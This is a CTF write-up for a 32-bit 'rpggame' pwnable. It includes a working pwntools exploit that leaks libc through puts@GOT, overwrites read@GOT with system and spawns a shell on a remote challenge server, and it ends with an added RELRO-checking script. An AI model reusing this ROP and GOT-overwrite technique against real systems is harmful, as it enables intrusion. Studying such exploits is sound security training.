hOwDayS 선린 10720
TRUSTEALTH rpggame
Introduction
I only found out later that a CTF was being held at Dimigo (I don't have any acquaintances in this field...) and joined; while working through the pwnables I'm jotting down one problem.
Protections
Protection | Status |
---|---|
RELRO | Partial RELRO |
Stack Canary | No Canary |
NX | NX enabled |
PIE | No PIE |
Analysis
Menu
fight
trainning
winner
The vulnerability is in the read() inside the winner function, so to get winner to run you raise power above 800 through trainning.
Leak
Leak libc using puts_got
Exploit
1. write /bin/sh on bss
2. overwrite read_got with system
3. run read_plt
Exploit Code
I used s.recv() a lot to match the server environment.

```python
# pwntools, Python 2 style (str payloads); target is 32-bit, No PIE, Partial RELRO
from pwn import *

s = remote("198.13.62.9", 5467)
e = ELF("./libc-2.23.so")

# Fixed addresses (No PIE): PLT/GOT entries and ROP gadgets taken from the binary
puts_plt = 0x8048410
puts_got = 0x804a014
read_plt = 0x80483f0
read_got = 0x804a00c
pr = 0x80488cb            # pop ; ret
pppr = 0x80488c9          # pop ; pop ; pop ; ret
bss = 0x0804a030 + 100    # writable scratch area for "/bin/sh"

for i in range(20):  # trainning: raise power past 800
    s.recv()
    s.sendline(str(3))
    s.recv()

# BUF: reach the vulnerable read() and send the overflow
s.recv()
s.sendline(str(1))
s.recv()
s.recv()

payload = "A" * 0x36  # buf
payload += "A" * 4    # sfp

# libc leak: puts(puts_got), then pop the argument and continue the chain
payload += p32(puts_plt)
payload += p32(pr)
payload += p32(puts_got)

# read /bin/sh on bss: read(0, bss, 100)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(100)

# overwrite read to system: read(0, read_got, 100) (GOT is writable under Partial RELRO)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(100)

# call shell: read_plt now goes to system; "AAAA" is the dummy return address
payload += p32(read_plt)
payload += "AAAA"
payload += p32(bss)

s.send(payload)

leak = u32(s.recv(4)[0:])
libc = leak - e.symbols["puts"]
system_addr = libc + e.symbols["system"]
log.info("Leak libc : " + hex(libc))
log.info("System addr : " + hex(system_addr))
s.recv()
s.send("/bin/sh")        # lands in bss via the first read()
s.recv()
s.send(p32(system_addr)) # lands in read_got via the second read()
s.interactive()
```
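As an added example (not part of the original write-up or the challenge), a small checker that reads an ELF's program headers and .dynamic section and reports the RELRO level shown in the protections table; it makes explicit why step 2 (overwriting read_got) works under Partial RELRO and would fault under Full RELRO. The ELF images it is tested against are constructed in `build_elf32()`, not the challenge binary.

```python
import struct

PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474e552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6ffffffb
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def relro_status(elf: bytes) -> str:
    """'No RELRO' / 'Partial RELRO' / 'Full RELRO' for an ELF32 or ELF64 image.
    Partial RELRO (this binary) leaves the GOT writable, so read@got can be
    replaced; Full RELRO needs BIND_NOW too, after which the GOT is read-only."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = elf[4] == 2                                   # EI_CLASS: 1 = ELF32, 2 = ELF64
    if is64:                                             # e_phoff, e_phentsize, e_phnum
        (phoff,), (phentsize, phnum) = struct.unpack_from("<Q", elf, 32), struct.unpack_from("<HH", elf, 54)
        phdr_fmt, dyn_fmt = "<IIQQQQQQ", "<qQ"
    else:
        (phoff,), (phentsize, phnum) = struct.unpack_from("<I", elf, 28), struct.unpack_from("<HH", elf, 42)
        phdr_fmt, dyn_fmt = "<8I", "<iI"
    has_relro, dyn_range = False, (0, 0)
    for i in range(phnum):
        ph = struct.unpack_from(phdr_fmt, elf, phoff + i * phentsize)
        p_offset, p_filesz = (ph[2], ph[5]) if is64 else (ph[1], ph[4])
        if ph[0] == PT_GNU_RELRO:
            has_relro = True
        elif ph[0] == PT_DYNAMIC:
            dyn_range = (p_offset, p_offset + p_filesz)
    if not has_relro:
        return "No RELRO"
    bind_now, size, (off, end) = False, struct.calcsize(dyn_fmt), dyn_range
    while off + size <= end:                             # walk .dynamic until DT_NULL
        tag, val = struct.unpack_from(dyn_fmt, elf, off)
        off += size
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            bind_now = True
    return "Full RELRO" if bind_now else "Partial RELRO"

def build_elf32(relro: bool, bind_now: bool) -> bytes:
    """Constructed minimal i386 ET_EXEC image (headers + .dynamic only) for offline testing."""
    dyn = (struct.pack("<iI", DT_FLAGS, DF_BIND_NOW) if bind_now else b"") + struct.pack("<iI", DT_NULL, 0)
    n_ph = 2 if relro else 1
    phdrs = [(PT_DYNAMIC, 52 + 32 * n_ph, 0, 0, len(dyn), len(dyn), 6, 4)]  # .dynamic follows the phdrs
    if relro:
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)    # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0, 52, 0, 0, 52, 32, n_ph, 40, 0, 0)
    return ehdr + b"".join(struct.pack("<8I", *p) for p in phdrs) + dyn
```

Run `relro_status(open(path, "rb").read())` on a real binary to get the same verdict checksec prints; a Partial RELRO result means the GOT overwrite in step 2 is possible.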